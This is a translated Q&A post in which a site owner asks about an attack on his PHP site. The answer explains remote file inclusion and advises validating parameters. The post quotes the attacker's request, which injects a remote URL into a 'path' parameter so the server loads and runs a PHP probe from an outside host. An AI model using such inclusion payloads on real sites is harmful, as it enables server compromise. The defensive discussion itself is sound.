一个名叫ShiroHige的家伙正试图入侵我的网站。
他尝试使用以下参数打开页面:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
如果您查看该文本文件,则只是
die()
,<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
那么他想使用什么漏洞利用(WordPress?)?
编辑1:
我知道他正在尝试使用RFI。
是否有一些流行的脚本可以利用该脚本(Drupal,phpBB等)?
最佳答案
攻击者针对的漏洞可能是利用PHP的include
和类似的函数/构造的远程文件包含,这些功能/构造允许加载(remote) file并执行其内容:
请注意,使用readfile
只会避免执行加载的文件。但是仍然有可能利用它来加载其他内容,然后将这些内容直接打印给用户。这可用于打印本地文件系统中任何类型文件的纯内容(即Path Traversal)或将代码注入(inject)页面中(即Code Injection)。因此,唯一的保护措施是在使用前验证参数值。
另请参见OWASP’s Development Guide on “File System – Includes and Remote files”以获取更多信息。